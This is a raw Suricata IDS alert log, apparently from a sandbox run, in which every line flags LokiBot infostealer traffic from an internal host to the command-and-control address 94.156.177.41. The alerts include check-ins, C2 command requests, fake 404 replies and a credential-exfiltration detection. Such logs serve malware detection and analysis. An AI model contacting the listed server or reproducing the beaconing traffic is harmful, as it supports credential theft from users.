                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49177 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49177 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49177 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49188 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49188 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49182 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49188 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49182 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49187 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49187 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49185 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49182 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49185 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49187 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49185 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49171 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49171 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49171 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49176 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49177 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49182 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49177 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49188 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49182 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49190 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49188 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49171 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49187 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49168 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49190 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49187 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49190 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49168 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49176 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49177
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49190 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49168 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49190 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49187
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49171 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49195 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49195 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49195 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49182
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49188
                    Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49168 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49171
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49195 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49195 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49185 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49185 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49210 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49210 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49210 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49207 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49192 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49186 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49207 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49207 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49195
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49203 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49203 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49190
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49203 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49194 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49192 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49174 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49203 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49203 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49205 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49194 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49205 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49205 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49194 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49185
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49205 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49214 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49205 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49210 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49213 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49210 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49186 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49186 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49207 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49205
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49192 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49214 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49189 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49189 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49189 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49186 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49199 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49178 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49178 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49202 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49206 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49222 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49227 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49227 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49214 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49227 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49174 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49186 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49174 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49194 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49213 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49176 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49233 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49178 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49233 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49236 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49236 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49236 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49206 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49206 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49198 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49169 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49236 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49236 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49206 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49206 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49206
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49212 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49178 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49199 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49178 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49199 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49241 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49186
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49227 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49214 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49227 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49214 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49199 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49199 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49192 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49207 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49213 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49225 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49189 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49225 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49225 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49197 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49203
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49212 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49245 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49174 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49241 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49241 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49173 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49173 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49173 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49227
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49198 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49213 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49176 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49213 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49222 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49241 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49176 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49199
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49229 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49194 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49212 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49229 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49225 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49225 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49228 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49228 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49228 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49212 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49212 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49174 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49233 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49213
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49178
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49228 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49228 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49192 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49189 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49214
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49222 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49189
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49239 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49239 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49239 -> 94.156.177.41:80
